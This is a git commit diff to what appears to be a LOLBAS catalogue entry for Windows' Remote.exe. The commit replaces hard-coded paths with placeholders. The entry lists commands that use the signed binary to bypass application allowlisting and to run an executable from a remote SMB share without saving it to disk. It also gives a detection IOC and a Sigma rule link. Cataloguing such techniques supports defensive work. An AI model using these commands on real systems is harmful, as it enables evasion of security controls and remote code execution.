Generalising file paths and urls, see #10 (#422)

This commit is contained in:
Wietze
2025-01-28 11:15:01 +00:00
committed by GitHub
parent e62749f81a
commit a79893e7ad
196 changed files with 555 additions and 758 deletions

View File

@@ -4,8 +4,8 @@ Description: Debugging tool included with Windows Debugging Tools
Author: mr.d0x
Created: 2021-06-01
Commands:
- Command: Remote.exe /s "powershell.exe" anythinghere
Description: Spawns powershell as a child process of remote.exe
- Command: Remote.exe /s {PATH:.exe} anythinghere
Description: Spawns specified executable as a child process of remote.exe
Usecase: Executes a process under a trusted Microsoft signed binary
Category: AWL Bypass
Privileges: User
@@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: Remote.exe /s "powershell.exe" anythinghere
Description: Spawns powershell as a child process of remote.exe
- Command: Remote.exe /s {PATH:.exe} anythinghere
Description: Spawns specified executable as a child process of remote.exe
Usecase: Executes a process under a trusted Microsoft signed binary
Category: Execute
Privileges: User
@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
- Command: Remote.exe /s {PATH_SMB:.exe} anythinghere
Description: Run a remote file
Usecase: Executing a remote binary without saving file to disk
Category: Execute
@@ -35,8 +35,6 @@ Commands:
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
Code_Sample:
- Code:
Detection:
- IOC: remote.exe process spawns
- Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml